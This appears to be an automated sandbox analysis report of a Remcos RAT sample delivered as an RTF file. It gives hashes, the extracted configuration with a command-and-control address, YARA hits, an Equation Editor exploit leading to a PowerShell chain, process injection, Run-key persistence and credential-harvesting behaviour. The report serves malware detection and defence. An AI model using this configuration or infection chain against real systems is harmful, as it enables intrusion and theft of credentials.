remcos | aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030

Analysis

max time kernel
150s
max time network
140s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
16/03/2024, 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030.rtf
Size

70KB
MD5

cae8bb9d33e2340998ba5f75ad37f803
SHA1

75e142060680509acade4921ea417e1d438a34fd
SHA256

aa48be12373eee7adb43270e7adde9a854875ceebd5c267fa6bbb79e91ce2030
SHA512

5b5ba31eef6383798733fcb5bbbbe0b28a35b8962207b8a08c494aa18ce48cf4f296af18299b8ddff51b7d6eb07d4864b3ddf4f95bebc8c76959f8ba1e0f8d98
SSDEEP

1536:z8dfmjJH0y/OSefByvp/9/7otRf9rdO5WeIGLTlGrzYNY:z8dfW0yvDToXf9rd2WeI0RGYNY

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.172.31.178:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NVSJ5U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 23 IoCs

resource	yara_rule
behavioral1/memory/1876-153-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-155-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-159-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-157-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-161-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-165-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-167-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-170-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-171-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-172-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-174-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-175-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-176-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-177-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-179-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-208-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-209-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-211-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-212-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-213-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-232-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-233-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/1876-234-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Detects executables built or packed with MPress PE compressor 12 IoCs

resource	yara_rule
behavioral1/memory/2116-183-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2116-187-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/3000-189-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2116-190-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/3000-193-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/3000-199-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs

resource	yara_rule
behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs

resource	yara_rule
behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

resource	yara_rule
behavioral1/memory/2116-198-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2116-195-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/3000-201-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/3000-202-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2116-207-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/3000-210-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 6 IoCs

flow	pid	Process
3	3048	EQNEDT32.EXE
7	2948	powershell.exe
9	2948	powershell.exe
11	2948	powershell.exe
14	2948	powershell.exe
15	2948	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\KISS.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2948 set thread context of 1876	2948	powershell.exe	38
PID 1876 set thread context of 2116	1876	RegAsm.exe	40
PID 1876 set thread context of 3000	1876	RegAsm.exe	41

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
3048	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2784	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2868	powershell.exe
2948	powershell.exe
1992	powershell.exe
2116	RegAsm.exe
2116	RegAsm.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1876	RegAsm.exe
1876	RegAsm.exe
1876	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2784	WINWORD.EXE
2784	WINWORD.EXE

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 3048 wrote to memory of 2664	3048	EQNEDT32.EXE	29
PID 3048 wrote to memory of 2664	3048	EQNEDT32.EXE	29
PID 3048 wrote to memory of 2664	3048	EQNEDT32.EXE	29
PID 3048 wrote to memory of 2664	3048	EQNEDT32.EXE	29
PID 2664 wrote to memory of 2868	2664	WScript.exe	30
PID 2664 wrote to memory of 2868	2664	WScript.exe	30
PID 2664 wrote to memory of 2868	2664	WScript.exe	30
PID 2664 wrote to memory of 2868	2664	WScript.exe	30
PID 2868 wrote to memory of 2948	2868	powershell.exe	34
PID 2868 wrote to memory of 2948	2868	powershell.exe	34
PID 2868 wrote to memory of 2948	2868	powershell.exe	34
PID 2868 wrote to memory of 2948	2868	powershell.exe	34
PID 2784 wrote to memory of 752	2784	WINWORD.EXE	35
PID 2784 wrote to memory of 752	2784	WINWORD.EXE	35
PID 2784 wrote to memory of 752	2784	WINWORD.EXE	35
PID 2784 wrote to memory of 752	2784	WINWORD.EXE	35
PID 2948 wrote to memory of 1992	2948	powershell.exe	36
PID 2948 wrote to memory of 1992	2948	powershell.exe	36
PID 2948 wrote to memory of 1992	2948	powershell.exe	36
PID 2948 wrote to memory of 1992	2948	powershell.exe	36
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
PID 2948 wrote to memory of 1876	2948	powershell.exe	38
